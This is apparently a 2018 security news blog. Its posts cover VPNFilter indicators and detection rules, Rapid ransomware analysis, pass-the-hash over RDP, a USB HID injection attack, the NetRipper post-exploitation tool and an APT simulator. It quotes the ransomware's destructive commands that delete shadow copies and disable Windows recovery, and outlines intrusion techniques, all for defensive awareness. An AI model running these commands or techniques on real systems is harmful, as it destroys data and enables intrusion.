Cybernews

08.06.2018 08:57

VPN-Filter

Just the facts to understand, detect and block/mitigate as far as possible.
As having seen simmilarities (blackenergy) in the code, it is assumed that this malware/attack is coming from fancy bear (APT28). [Remember the German Bundestag]

Brief technical breakdown

The VPNFilter malware is a multi-stage, modular platform with versatile capabilities to support both intelligence-collection and destructive cyber attack operations.

The stage 1 malware persists through a reboot, which sets it apart from most other malware that targets internet-of-things devices because malware normally does not survive a reboot of the device. The main purpose of stage 1 is to gain a persistent foothold and enable the deployment of the stage 2 malware. Stage 1 utilizes multiple redundant command and control (C2) mechanisms to discover the IP address of the current stage 2 deployment server, making this malware extremely robust and capable of dealing with unpredictable C2 infrastructure changes.

The stage 2 malware, which does not persist through a reboot, possesses capabilities that we have come to expect in a workhorse intelligence-collection platform, such as file collection, command execution, data exfiltration and device management. However, some versions of stage 2 also possess a self-destruct capability that overwrites a critical portion of the device's firmware and reboots the device, rendering it unusable. Based on the actor's demonstrated knowledge of these devices, and the existing capability in some stage 2 versions, we assess with high confidence that the actor could deploy this self-destruct command to most devices that it controls, regardless of whether the command is built into the stage 2 malware.

In addition, there are multiple stage 3 modules that serve as plugins for the stage 2 malware. These plugins provide stage 2 with additional functionality. As of this writing, we are aware of two plugin modules: a packet sniffer for collecting traffic that passes through the device, including theft of website credentials and monitoring of Modbus SCADA protocols, and a communications module that allows stage 2 to communicate over Tor. We assess with high confidence that several other plugin modules exist, but we have yet to discover them.

Countermeasures

Using snort: https://www.snort.org/advisories/talos-rules-2018-05-24

VPNFILTER SPECIFIC SNORT DETECTION:

45563 45564 46782 46783

SNORT RULES THAT PROTECT AGAINST KNOWN VULNERABILITIES IN AFFECTED DEVICES:

25589 26276 26277 26278 26279 29830 29831 44743 46080 46081 46082 46083 46084 46085 46086 46287 46121 46122 46123 46124 41445 44971 46297 46298 46299 46300 46301 46305 46306 46307 46308 46309 46310 46315 46335 46340 46341 46342 46376 46377 37963 45555 46076 40063 44643 44790 26275 35734 41095 41096 41504 41698 41699 41700 41748 41749 41750 41751 44687 44688 44698 44699 45001 46312 46313 46314 46317 46318 46322 46323 40866 40907 45157

Check your ClamAV signatures to be up-to-date, espacially for:

CLAMAV SIGNATURES:
Unix.Trojan.Vpnfilter-6425811-0
Unix.Trojan.Vpnfilter-6425812-0
Unix.Trojan.Vpnfilter-6550590-0
Unix.Trojan.Vpnfilter-6550591-0
Unix.Trojan.Vpnfilter-6550592-0

And manually search and block the below IOCs:

Known C2 Domains and IPs

ASSOCIATED WITH THE 1ST STAGE
photobucket[.]com/user/nikkireed11/library
photobucket[.]com/user/kmila302/library
photobucket[.]com/user/lisabraun87/library
photobucket[.]com/user/eva_green1/library
photobucket[.]com/user/monicabelci4/library
photobucket[.]com/user/katyperry45/library
photobucket[.]com/user/saragray1/library
photobucket[.]com/user/millerfred/library
photobucket[.]com/user/jeniferaniston1/library
photobucket[.]com/user/amandaseyfried1/library
photobucket[.]com/user/suwe8/library
photobucket[.]com/user/bob7301/library
toknowall[.]com

ASSOCIATED WITH THE 2ND STAGE
91.121.109[.]209
217.12.202[.]40
94.242.222[.]68
82.118.242[.]124
46.151.209[.]33
217.79.179[.]14
91.214.203[.]144
95.211.198[.]231
195.154.180[.]60
5.149.250[.]54
91.200.13[.]76
94.185.80[.]82
62.210.180[.]229
91.200.13[.]76
23.111.177[.]114

6b57dcnonk2edf5a[.]onion/bin32/update.php
tljmmy4vmkqbdof4[.]onion/bin32/update.php
zuh3vcyskd4gipkm[.]onion/bin32/update.php
4seiwn2ur4f65zo4.onion/bin256/update.php
zm3lznxn27wtzkwa.onion/bin16/update.php

Known File Hashes

1ST STAGE MALWARE

50ac4fcd3fbc8abcaa766449841b3a0a684b3e217fc40935f1ac22c34c58a9ec
0e0094d9bd396a6594da8e21911a3982cd737b445f591581560d766755097d92
b9770ec366271dacdae8f5088218f65a6c0dd82553dd93f41ede586353986124
51e92ba8dac0f93fc755cb98979d066234260eafc7654088c5be320f431a34fa
6a76e3e98775b1d86b037b5ee291ccfcffb5a98f66319175f4b54b6c36d2f2bf
313d29f490619e796057d50ba8f1d4b0b73d4d4c6391cf35baaaace71ea9ac37

2ND STAGE MALWARE

9683b04123d7e9fe4c8c26c69b09c2233f7e1440f828837422ce330040782d17
d6097e942dd0fdc1fb28ec1814780e6ecc169ec6d24f9954e71954eedbc4c70e
4b03288e9e44d214426a02327223b5e516b1ea29ce72fa25a2fcef9aa65c4b0b
9eb6c779dbad1b717caa462d8e040852759436ed79cc2172692339bc62432387
37e29b0ea7a9b97597385a12f525e13c3a7d02ba4161a6946f2a7d978cc045b4
776cb9a7a9f5afbaffdd4dbd052c6420030b2c7c3058c1455e0a79df0e6f7a1d
8a20dc9538d639623878a3d3d18d88da8b635ea52e5e2d0c2cce4a8c5a703db1
0649fda8888d701eb2f91e6e0a05a2e2be714f564497c44a3813082ef8ff250b
2ffbe27983bc5c6178b2d447d8121cefaa5ffa87fe7b9e4f68272ce54787492f
1e741ec9452aab85a2f7d8682ef4e553cd74892e629012d903b521b21e3a15bf
90efcaeac13ef87620bcaaf2260a12895675c74d0820000b3cd152057125d802
eaf879370387a99e6339377a6149e289655236acc8de88324462dcd0f22383ff
081e72d96b750a38ef45e74d0176beb982905af4df6b8654ea81768be2f84497
24b3931e7d0f65f60bbb49e639b2a4c77de83648ff08e097ff0fa6a53f5c7102
4497af1407d33faa7b41de0c4d0741df439d2e44df1437d8e583737a07ec04a1
579b2e6290c1f7340795e42d57ba300f96aef035886e80f80cd5d0bb4626b5fc
eeb3981771e448b7b9536ba5d7cd70330402328a884443a899696a661e4e64e5
952f46c5618bf53305d22e0eae4be1be79329a78ad7ec34232f2708209b2517c
e70a8e8b0cd3c59cca8a886caa8b60efb652058f50cc9ff73a90bc55c0dc0866
5be57b589e5601683218bb89787463ca47ce3b283d8751820d30eee5e231678c
fe46a19803108381d2e8b5653cc5dce1581a234f91c555bbfff63b289b81a3dc
ae1353e8efe25b277f52decfab2d656541ffdf7fd10466d3a734658f1bc1187a
2ef0e5c66f6d46ddef62015ea786b2e2f5a96d94ab9350dd1073d746b6922859
181408e6ce1a215577c1daa195e0e7dea1fe9b785f9908b4d8e923a2a831fce8
2aa7bc9961b0478c552daa91976227cfa60c3d4bd8f051e3ca7415ceaeb604ca
375ededc5c20af22bdc381115d6a8ce2f80db88a5a92ebaa43c723a3d27fb0d6
0424167da27214cf2be0b04c8855b4cdb969f67998c6b8e719dd45b377e70353
7e5dca90985a9fac8f115eaacd8e198d1b06367e929597a3decd452aaa99864b
8de0f244d507b25370394ba158bd4c03a7f24c6627e42d9418fb992a06eb29d8
7ee215469a7886486a62fea8fa62d3907f59cf9bf5486a5fe3a0da96dabea3f9
ff70462cb3fc6ddd061fbd775bbc824569f1c09425877174d43f08be360b2b58
f5d06c52fe4ddca0ebc35fddbbc1f3a406bdaa5527ca831153b74f51c9f9d1b0
bc51836048158373e2b2f3cdb98dc3028290e8180a4e460129fef0d96133ea2e
d9a60a47e142ddd61f6c3324f302b35feeca684a71c09657ddb4901a715bd4c5
95840bd9a508ce6889d29b61084ec00649c9a19d44a29aedc86e2c34f30c8baf
3bbdf7019ed35412ce4b10b7621faf42acf604f91e5ee8a903eb58bde15688ff
9b455619b4cbfeb6496c1246ba9ce0e4ffa6736fd536a0f99686c7e185eb2e22
bfd028f78b546eda12c0d5d13f70ab27dff32b04df3291fd46814f486ba13693
a15b871fcb31c032b0e0661a2d3dd39664fa2d7982ff0dbc0796f3e9893aed9a
d1bc07b962ccc6e3596aa238bb7eda13003ea3ca95be27e8244e485165642548
eec5cd045f26a7b5d158e8289838b82e4af7cf4fc4b9048eaf185b5186f760db
29ae3431908c99b0fff70300127f1db635af119ee55cd8854f6d3270b2e3032e
ca0bb6a819506801fa4805d07ee2ebaa5c29e6f5973148fe25ed6d75089c06a7
6d8877b17795bb0c69352da59ce8a6bfd7257da30bd0370eed8428fad54f3128
5cf43c433fa1e253e937224254a63dc7e5ad6c4b3ab7a66ec9db76a268b4deeb
a6e3831b07ab88f45df9ffac0c34c4452c76541c2acd215de8d0109a32968ace
f4f0117d2784a3b8dfef4b5cb7f2583dd4100c32f9ee020f16402508e073f0a1
7093cc81f32c8ce5e138a4af08de6515380f4f23ed470b89e6613bee361159e1
350eaa2310e81220c409f95e6e1e53beadec3cffa3f119f60d0daace35d95437
776cb9a7a9f5afbaffdd4dbd052c6420030b2c7c3058c1455e0a79df0e6f7a1d
d2de662480783072b82dd4d52ab6c57911a1e84806c229f614b26306d5981d98
c8a82876beed822226192ea3fe01e3bd1bb0838ab13b24c3a6926bce6d84411b
f30a0fe494a871bd7d117d41025e8d2e17cd545131e6f27d59b5e65e7ab50d92
8a20dc9538d639623878a3d3d18d88da8b635ea52e5e2d0c2cce4a8c5a703db1
0649fda8888d701eb2f91e6e0a05a2e2be714f564497c44a3813082ef8ff250b
2c2412e43f3fd24d766832f0944368d4632c6aa9f5a9610ab39d23e79756e240
218233cc5ef659df4f5fdabe028ab43bc66451b49a6bfa85a5ed436cfb8dbc32
cccbf9bff47b3fd391274d322076847a3254c95f95266ef06a3ca8be75549a4b
ab789a5a10b4c4cd7a0eb92bbfcf2cc50cb53066838a02cfb56a76417de379c5
4896f0e4bc104f49901c07bc84791c04ad1003d5d265ab7d99fd5f40ec0b327f
5e715754e9da9ed972050513b4566fb922cd87958ecf472d1d14cd76923ae59a
797e31c6c34448fbecda10385e9ccfa7239bb823ac8e33a4a7fd1671a89fe0f6
48bfcbc3162a0b00412cba5eff6c0376e1ae4cfbd6e35c9ea92d2ab961c90342
7a66d65fa69b857beeeaaef67ec835900eee09a350b6f51f51c83919c9223793
b0edf66d4f07e5f58b082f5b8479d48fbab3dbe70eba0d7e8254c8d3a5e852ef
840ba484395e15782f436a7b2e1eec2d4bf5847dfd5d4787ae64f3a5f668ed4f
80c20db74c54554d9936a627939c3c7ea44316e7670e2f7f5231c0db23bc2114
5dabbce674b797aaa42052b501fb42b20be74d9ffcb0995d933fbf786c438178
055bbe33c12a5cdaf50c089a29eaecba2ccf312dfe5e96183b810eb6b95d6c5a
c084c20c94dbbffed76d911629796744eff9f96d24529b0af1e78cda54cdbf02
5f6ee521311e166243d3e65d0253d12d1506750c80cd21f6a195be519b5d697f
fcb6ff6a679ca17d9b36a543b08c42c6d06014d11002c09ba7c38b405b50debe
a168d561665221f992f51829e0b282eeb213b8aca3a9735dbbaecc4d699f66b9
98112bd4710e6ffe389a2beb13ff1162017f62a1255c492f29238626e99509f3
afacb38ea3a3cafe0f8dbd26dee7de3d0b24cdecae280a9b884fbad5ed195de7
b431aebc2783e72be84af351e9536e8110000c53ebb5db25e89021dc1a83625e
2b39634dce9e7bb36e338764ef56fd37be6cd0faa07ee3673c6e842115e3ceb1
11533eedc1143a33c1deae105e1b2b2f295c8445e1879567115adebfdda569e2
36e3d47f33269bef3e6dd4d497e93ece85de77258768e2fa611137fa0de9a043
e6c5437e8a23d50d44ee47ad6e7ce67081e7926a034d2ac4c848f98102ddb2f8
1cb3b3e652275656b3ae824da5fb330cccd8b27892fb29adc96e5f6132b98517
ec88fe46732d9aa6ba53eed99e4d116b7444afd2a52db988ea82f883f6d30268
99944ad90c7b35fb6721e2e249b76b3e8412e7f35f6f95d7fd3a5969eaa99f3d
8505ece4360faf3f454e5b47239f28c48d61c719b521e4e728bc12d951ecf315
dd88273437031498b485c380968f282d09c9bd2373ef569952bc7496ebadadde
6e7bbf25ea4e83229f6fa6b2fa0f880dde1594a7bec2aac02ff7d2d19945d036
f989df3aeede247a29a1f85fc478155b9613d4a416428188eda1a21bd481713a
4af2f66d7704de6ff017253825801c95f76c28f51f49ee70746896df307cbc29
ba9fee47dcc7bad8a7473405aabf587e5c8d396d5dd5f6f8f90f0ff48cc6a9ce
5d94d2b5f856e5a1fc3a3315d3cd03940384103481584b80e9d95e29431f5f7a
33d6414dcf91b9a665d38faf4ae1f63b7aa4589fe04bdd75999a5e429a53364a
14984efdd5343c4d51df7c79fd6a2dfd791aa611a751cc5039eb95ba65a18a54
879be2fa5a50b7239b398d1809e2758c727e584784ba456d8b113fc98b6315a2
c0cfb87a8faed76a41f39a4b0a35ac6847ffc6ae2235af998ee1b575e055fac2
fc9594611445de4a0ba30daf60a7e4dec442b2e5d25685e92a875aca2c0112c9
81cbe57cd80b752386ee707b86f075ad9ab4b3a97f951d118835f0f96b3ae79d
4e022e4e4ee28ae475921c49763ee620b53bf11c2ad5fffe018ad09c3cb078cc
a3cf96b65f624c755b46a68e8f50532571cee74b3c6f7e34eecb514a1eb400cf
ff471a98342bafbab0d341e0db0b3b9569f806d0988a5de0d8560b6729875b3e
638957e2def5a8fda7e3efefff286e1a81280d520d5f8f23e037c5d74c62553c
4ffe074ad2365dfb13c1c9ce14a5e635b19acb34a636bae16faf9449fb4a0687
4c596877fa7bb7ca49fb78036b85f92b581d8f41c5bc1fa38476da9647987416
49a0e5951dbb1685aaa1a6d2acf362cbf735a786334ca131f6f78a4e4c018ed9
0dc1e3f36dc4835db978a3175a462aa96de30df3e5031c5d0d8308cdd60cbede
e74ae353b68a1d0f64b9c8306b2db46dfc760c1d91bfdf05483042d422bff572
00c9bbc56388e3fffc6e53ef846ad269e7e31d631fe6068ff4dc6c09fb40c48b
c2bcde93227eb1c150e555e4590156fe59929d3b8534a0e2c5f3b21ede02afa0
70c271f37dc8c3af22fdcad96d326fe3c71b911a82da31a992c05da1042ac06d
ffb0e244e0dabbaabf7fedd878923b9b30b487b3e60f4a2cf7c0d7509b6963ba
dbede977518143bcee6044ed86b8178c6fc9d454fa346c089523eedee637f3be
4d6cbde39a81f2c62d112118945b5eeb1d73479386c962ed3b03d775e0dccfa0
fa229cd78c343a7811cf8314febbc355bb9baab05b270e58a3e5d47b68a7fc7d
4beba775f0e0b757ff32ee86782bf42e997b11b90d5a30e5d65b45662363ece2
a41da0945ca5b5f56d5a868d64763b3a085b7017e3568e6d49834f11952cb927
f3d0759dfab3fbf8b6511a4d8b5fc087273a63cbb96517f0583c2cce3ff788b8
fa4b286eeaf7d74fe8f3fb36d80746e18d2a7f4c034ae6c3fa4c917646a9e147
be3ddd71a54ec947ba873e3e10f140f807e1ae362fd087d402eff67f6f955467
6449aaf6a8153a9ccbcef2e2738f1e81c0d06227f5cf4823a6d113568f305d2a
39dc1aded01daaf01890db56880f665d6cafab3dea0ac523a48aa6d6e6346fff
01d51b011937433568db646a5fa66e1d25f1321f444319a9fba78fd5efd49445
099a0b821f77cb4a6e6d4a641ed52ee8fea659ee23b657e6dae75bb8ca3418c3
4cbf9ecb6ca4f2efed86ba6ebf49436c65afe7ae523ec9dae58e432a9d9a89d0
66a98ad0256681313053c46375cb5c144c81bf4b206aaa57332eb5f1f7176b8c
97d00fc2bc5f5c9a56b498cf83b7a801e2c11c056772c5308ee7adea50556309
9e854d40f22675a0f1534f7c31626fd3b67d5799f8eea4bd2e2d4be187d9e1c7
a125b3e627ecd04d0dd8295e12405f2590144337481eb21086c4afb337c5b3f2
a7d154eaee39ff856792d86720a8d193da3d73bfe4ac8364da030d80539e9ac2
b2dd77af9dd9e8d7d4ebc778f00ff01c53b860a04c4e0b497f2ae74bb8a280c0

3RD STAGE PLUGINS

f8286e29faa67ec765ae0244862f6b7914fcdde10423f96595cb84ad5cc6b344
afd281639e26a717aead65b1886f98d6d6c258736016023b4e59de30b7348719
acf32f21ec3955d6116973b3f1a85f19f237880a80cdf584e29f08bd12666999
47f521bd6be19f823bfd3a72d851d6f3440a6c4cc3d940190bdc9b6dd53a83d6
d09f88baf33b901cc8a054d86879b81a81c19be45f8e05484376c213f0eedda2
2af043730b632d237964dd6abd24a7f6db9dc83aab583532a1238b4d4188396b
4bfc43761e2ddb65fedab520c6a17cc47c0a06eda33d11664f892fcf08995875
cd8cf5e6a40c4e87f6ee40b9732b661a228d87d468a458f6de231dd5e8de3429
bad8a5269e38a2335be0a03857e65ff91620a4d1e5211205d2503ef70017b69c
ff118edb9312c85b0b7ff4af1fc48eb1d8c7c8da3c0e1205c398d2fe4a795f4b
6807497869d9b4101c335b1688782ab545b0f4526c1e7dd5782c9deb52ee3df4
3df17f01c4850b96b00e90c880fdfabbd11c64a8707d24488485dd12fae8ec85
1367060db50187eca00ad1eb0f4656d3734d1ccea5d2d62f31f21d4f895e0a69
94eefb8cf1388e431de95cab6402caa788846b523d493cf8c3a1aa025d6b4809
78fee8982625d125f17cf802d9b597605d02e5ea431e903f7537964883cf5714
3bd34426641b149c40263e94dca5610a9ecfcbce69bfdd145dff1b5008402314

SELF-SIGNED CERTIFICATE FINGERPRINTS

d113ce61ab1e4bfcb32fb3c53bd3cdeee81108d02d3886f6e2286e0b6a006747
c52b3901a26df1680acbfb9e6184b321f0b22dd6c4bb107e5e071553d375c851
f372ebe8277b78d50c5600d0e2af3fe29b1e04b5435a7149f04edd165743c16d
be4715b029cbd3f8e2f37bc525005b2cb9cad977117a26fac94339a721e3f2a5
27af4b890db1a611d0054d5d4a7d9a36c9f52dffeb67a053be9ea03a495a9302
110da84f31e7868ad741bcb0d9f7771a0bb39c44785055e6da0ecc393598adc8
fb47ba27dceea486aab7a0f8ec5674332ca1f6af962a1724df89d658d470348f
b25336c2dd388459dec37fa8d0467cf2ac3c81a272176128338a2c1d7c083c78
cd75d3a70e3218688bdd23a0f618add964603736f7c899265b1d8386b9902526
110da84f31e7868ad741bcb0d9f7771a0bb39c44785055e6da0ecc393598adc8
909cf80d3ef4c52abc95d286df8d218462739889b6be4762a1d2fac1adb2ec2b
044bfa11ea91b5559f7502c3a504b19ee3c555e95907a98508825b4aa56294e4
c0f8bde03df3dec6e43b327378777ebc35d9ea8cfe39628f79f20b1c40c1b412
8f1d0cd5dd6585c3d5d478e18a85e7109c8a88489c46987621e01d21fab5095d
d5dec646c957305d91303a1d7931b30e7fb2f38d54a1102e14fd7a4b9f6e0806
c0f8bde03df3dec6e43b327378777ebc35d9ea8cfe39628f79f20b1c40c1b412

Check your equipment List for below systems that are known to be affected:

ASUS DEVICES:RT-AC66U (new)
RT-N10 (new)
RT-N10E (new)
RT-N10U (new)
RT-N56U (new)
RT-N66U (new)

D-LINK DEVICES:DES-1210-08P (new)
DIR-300 (new)
DIR-300A (new)
DSR-250N (new)
DSR-500N (new)
DSR-1000 (new)
DSR-1000N (new)

HUAWEI DEVICES:HG8245 (new)

LINKSYS DEVICES:E1200
E2500
E3000 (new)
E3200 (new)
E4200 (new)
RV082 (new)
WRVS4400N

MIKROTIK DEVICES:CCR1009 (new)
CCR1016
CCR1036
CCR1072
CRS109 (new)
CRS112 (new)
CRS125 (new)
RB411 (new)
RB450 (new)
RB750 (new)
RB911 (new)
RB921 (new)
RB941 (new)
RB951 (new)
RB952 (new)
RB960 (new)
RB962 (new)
RB1100 (new)
RB1200 (new)
RB2011 (new)
RB3011 (new)
RB Groove (new)
RB Omnitik (new)
STX5 (new)

NETGEAR DEVICES:DG834 (new)
DGN1000 (new)
DGN2200
DGN3500 (new)
FVS318N (new)
MBRN3000 (new)
R6400
R7000
R8000
WNR1000
WNR2000
WNR2200 (new)
WNR4000 (new)
WNDR3700 (new)
WNDR4000 (new)
WNDR4300 (new)
WNDR4300-TN (new)
UTM50 (new)

QNAP DEVICES:TS251
TS439 Pro
Other QNAP NAS devices running QTS software

TP-LINK DEVICES:R600VPN
TL-WR741ND (new)
TL-WR841N (new)

UBIQUITI DEVICES:NSM2 (new)
PBE M5 (new)

UPVEL DEVICES:Unknown Models* (new)

ZTE DEVICES:ZXHN H108N (new)

07.06.2018 08:34

Marcus in the news ...

Being a little proud of writing for Airbus:

07.06.2018 08:28

ATT&CK Intel query tool for MITRE

Recently found an announcement at KitPloit:

Checkout gr4ym4ntx/attackintel for querying the MITRE API for certain TTP's.

Goals

Quickly align updated tactics, techniques, mitigation, and detection information from MITRE ATT&CK API for a specific threat
Brush up on my python skills and get familiar with GIT while drinking coffee

07.06.2018 08:19

How Apple stores all your email metadata for years on their servers

Sabri wrote a cool article here.

Today I’m going to reveal how Apple ended up with all the metadata of the emails you ever sent (and even received in some cases) using the official Mail app since the launch of iCloud.

Many years ago I stopped using Gmail but I kept the account. Instead of deleting it I deleted everything inside including emails and contacts and kept it connected to my phone using the official Mail app. 2 years ago, I noticed that when writing an email and started to type the recipient I could see my deleted contacts showing up. I checked Google again and even iCloud Contacts but nothing.

Ever since I never had time to properly investigate what actually happened but with this GDPR day, I remembered of this and I was more than willing to take a closer look.

.... (continue reading)

24.05.2018 09:14

Hunting for evil: detect office macros being executed

Door Pieter Ceelen is writing a cool article about detecting macro executions.

....

Sysmon to the rescue?

So, lets monitor for registry changes on this registry hive, for this we will use Sysmon (and assume Windows event collection is in place to aggregate these logs from all workstations).

The following basic Sysmon config creates an event at every ‘protect document editing’ or ‘enable macros’

Example event generated

In my limited testing (Win7, Office 2016) I identified the following 3 moments in time when the event fires:

When end-user marks a protected document for editing
When end-user enables macros
When end-user opens a document that already has a trust record

24.05.2018 09:10

Passing the hash with native RDP client (mstsc.exe)

Michael Eder is giving a cool POC on playing with mstsc.exe and mimikatz.

TL;DR: If the remote server allows Restricted Admin login, it is possible to login via RDP by passing the hash using the native Windows RDP client mstsc.exe. (You’ll need mimikatz or something else to inject the hash into the process)

24.05.2018 09:06

The Evil Mouse Project

Beware of mice, get yourself a cat. .-)

/dev/random is writing a fantastic article of how to invest 30€ into a WiFi-HID-Injector.

Connect the evil USB device to the victim’s computer or ask him/her to do it (with some social engineering tricks)
Once inserted, the USB device adds a new serial port and fires up the wireless network
The attacker, located close enough to get the wireless signal, takes control of the device, loads his payload
The HID (keyboard) injects the payload by simulating keystrokes (like a Teensy) and executes it
The payload sends data to the newly created serial port. Data will be saved to a flat file on the USB device storage
The attack can download those files

16.05.2018 15:34

Hacking attempt on central.owncloud.org

An original blog post of owncloud.com:

Dear users of central.owncloud.org,

Our community forum became the target of an attack. As a result, an intruder was able to determine the password of an admin account and downloaded a backup of the database by changing an email address. For security reasons, we had decided to take https://central.owncloud.org offline in order to avoid additional damage and to carry out a comprehensive security audit. We have reversed any changes and are now bringing this forum back online.

We kindly ask all users to immediately change their passwords on central.owncloud.org and on any other services where you used the same password. We also recommend activating 2-factor authentication if no authentication via GitHub or other login providers is active. If you have registered via GitHub, please enable 2-factor-authentication there as well.

If you find any security issues, please report it to us on Hackerone: https://hackerone.com/owncloud

Through the attack, the attacker gained access to the following data:
Full name, e-mail address, hashed password and any other data you have entered in your profile. This does NOT mean that the attacker knows your password - he has a hashed version of it, but as a precaution for possible brute-force attacks please change it, here and on all other services where you might be using the same password.

ownCloud is currently in contact with the attacker via hackerone. Until now, no intention to use the captured data has been identified.

What we have done so far:
We reviewed all logfiles and reconstructed the exact chronology of hacker actions.
No file changes were detected during this process. Furthermore, all files were reset to the time before the attack. In addition, an update to Discourse 2.0.0 (beta 9) has been made. The version also includes the latest security updates. All modifications to the configuration have been undone. The admin access has been reduced to the absolute minimum.

We kindly ask our users to carry out the above measures and assure you that ownCloud will do everything possible to ensure the security of your data.

Your ownCloud Team

16.05.2018 15:28

EFAIL

EFAIL, it's not PGP that has been compromised but the way is was implemented into modern mail clients...

But read more at https://efail.de/

06.05.2018 15:56

BBC: Twitter users told to change passwords after internal leak

BBS UK writes about Twitters password desaster.

In short:

Chief executive Jack Dorsey tweeted to say the "bug" had been fixed.

06.05.2018 15:47

APT simulation using Splunk

A little demo in Splunk to visualise the APT attacks performed by the APT Simulator.

Makes it possible to demonstrate the live APT aktions of the simulator within a Splunk daskboard. Might be very usefull for demos an impressing managers. :-)

Read the my article at the subpage here.

Splunk APT demonstration

Splunk chart showing the attacks performed by the APT-simulator.

03.05.2018 09:52

NetRipper

NytroRST/NetRipper

"Catch before encrypt"

The post-exploitation activities in a penetration test can be challenging if the tester has low-privileges on a fully patched, well configured Windows machine. This work presents a technique for helping the tester to find useful information by sniffing network traffic of the applications on the compromised machine, despite his low-privileged rights. Furthermore, the encrypted traffic is also captured before being sent to the encryption layer, thus all traffic (clear-text and encrypted) can be sniffed. The implementation of this technique is a tool called NetRipper which uses API hooking to do the actions mentioned above and which has been especially designed to be used in penetration tests, but the concept can also be used to monitor network traffic of employees or to analyze a malicious application.

NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption.

NetRipper was released at Defcon 23, Las Vegas, Nevada.

Metasploit installation (Kali)

mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
cp Metasploit/netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper.rb
cp x86/DLL.x86.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.x86.dll
cp x64/DLL.x64.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.x64.dll

03.05.2018 08:01

APT simulator

Nextron Systems GmbH gave us a cool bunch of tools to simulate APT attacks on a Windows machine.

The "infection" stays completle harmless and everything is done by downloading and running a simple BAT-file without any fancy stuff to be installed.
Just have a look at the list of testcases below for a quick check of the abilities.

Right now, I've installed the sysmon at the same system and use a splunk forwarder to monitor the victim for evidences of APT's. Also the usecase checks are about to be completly done at the Spunk side to give the team a comprehensive monitoring and training scenario. Although the Splunk sysmon app is detecting a view things already and proves me that this way of doing will/can work.

Stay tuned for further news about this project... :-)

The below table shows the different test cases and the expected detection results.

AV = Antivirus
NIDS = Network Intrusion Detection System
EDR = Endpoint Detection and Response
SM = Security Monitoring
CA = Compromise Assessment

Test Case	AV	NIDS	EDR	SM	CA
Collect Local Files					X
C2 Connects	(X)	X	X	X
DNS Cache 1 (Cache Injection)	(X)	X		X	X
Malicious User Agents (Malware, RATs)		X	X	X
Ncat Back Connect (Drop & Exec)	X		X	X	X
WMI Backdoor C2			X	X	X
LSASS Dump (with Procdump)			X	X	X
Mimikatz 1 (Drop & Exec)	X		X	X	X
WCE 1 (Eventlog entries)			X	X	X
Active Guest Account Admin			X	X	X
Fake System File (Drop & Exec)			X	X	X
Hosts File (AV/Win Update blocks)	(X)		X		X
Obfuscated JS Dropper	(X)	X	X	X	X
Obfuscation (RAR with JPG ext)					(X)
Nbtscan Discovery (Scan & Output)		X	X	(X)	X
Recon Activity (Typical Commands)			X	X	X
PsExec (Drop & Exec)			X	X	X
Remote Execution Tool (Drop)	(X)				X
At Job			X	X	X
RUN Key Entry Creation			X	X	X
Scheduled Task Creation			X	X	X
StickyKey Backdoor			X		X
UserInitMprLogonScript Persistence			(X)	X	X
Web Shells	X		(X)		X
WMI Backdoor			X		X

26.04.2018 08:43

GMail update

All better and saver due to AI:

Acticate the new GMail feater at your settings and enjoy some cool features helping to fight spearfishing, use configentialety (!?!?) and have the KI automatically answer emails.

26.04.2018 08:37

MyEtherWallet hit by BGP hack

Although MyEtherwallet is talking about DNS-sppofing it was more likely a BGP-Rerouting hack at Amazon that happened 24th.Apr.18.

The attackers used BGP — a key protocol used for routing internet traffic around the world — to reroute traffic to Amazon’s Route 53 service, the largest commercial cloud provider who count major websites such as Twitter.com as customers.

They re-routed DNS traffic using a man in the middle attack using a server at Equinix in Chicago.

From there, they served traffic for over two hours.

This would allow them to intercept traffic globally across the internet to Amazon Route 53 customers.

19.04.2018 09:14

Goodies from UK

The GCHQ is using a tool that is available to the community for helping your incident response/analysis as well.

Worth having a look at what is call "Cyber Chef". Including it's Splunk TA.

If it's worth istalling and using at your site of the wire, have a look at the live demo first.

The capabilities at a glance:

Decode a Base64-encoded string
Convert a date and time to a different time zone
Parse a Teredo IPv6 address
Convert data from a hexdump, then decompress
Decrypt and disassemble shellcode
Display multiple timestamps as full dates
Carry out different operations on data of different types
Use parts of the input as arguments to operations

What

A simple, intuitive web app for analysing and decoding data without having to deal with complex tools or programming languages. CyberChef encourages both technical and non-technical people to explore data formats, encryption and compression.

Why

Digital data comes in all shapes, sizes and formats in the modern world – CyberChef helps to make sense of this data all on one easy-to-use platform.

How

The interface is designed with simplicity at its heart. Complex techniques are now as trivial as drag-and-drop. Simple functions can be combined to build up a "recipe", potentially resulting in complex analysis, which can be shared with other users and used with their input.

For those comfortable writing code, CyberChef is a quick and efficient way to prototype solutions to a problem which can then be scripted once proven to work.

Who

It is expected that CyberChef will be useful for cybersecurity and antivirus companies. It should also appeal to the academic world and any individuals or companies involved in the analysis of digital data, be that software developers, analysts, mathematicians or casual puzzle solvers.

Aim

It is hoped that by releasing CyberChef through GitHub, contributions can be added which can be rolled out into future versions of the tool.

There are around 200 useful operations in CyberChef for anyone working on anything vaguely Internet-related, whether you just want to convert a timestamp to a different format, decompress gzipped data, create a SHA3 hash, or parse an X.509 certificate to find out who issued it.

It’s the Cyber Swiss Army Knife.

17.04.2018 13:19

Rapid Ransomware Continues Encrypting New Files as they Are Created

How Rapid Ransomware encrypts a computer

When the ransomware runs, it will clear the Windows shadow volume copies, terminate database processes, and disables automatic repair. The processes that are terminated are sql.exe, sqlite.exe, and oracle.com and the commands that are executed are:

vssadmin.exe Delete Shadow /All /Quiet
cmd.exe /C bcdedit /set {default} recoveryenabled No
cmd.exe /C bcdedit /set {default} bootstatuspolicy ignoreallfailures

Once these commands are executed, the ransomware will scan the computer for files to encrypt. When a file is encrypted it will have the .rapid extension appended to the encrypted file's name.

Unfortunatly the priv. decryption key is stored at the attacker machine only. Hence, no real chance (yet) to decrypt.

IOCsHashes:

125c2bcb0cd05512391a695f907669b2f55a8b69c9d4df2ce1b6c9c5a1395b61

Files Associated with the Rapid Ransomware:

%AppData%\info.exe
%AppData%\How Recovery Files.txt
%AppData%\recovery.txt

Registry Entries Associated with the Rapid Ransomware:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Encrypter"="%AppData%\info.exe"
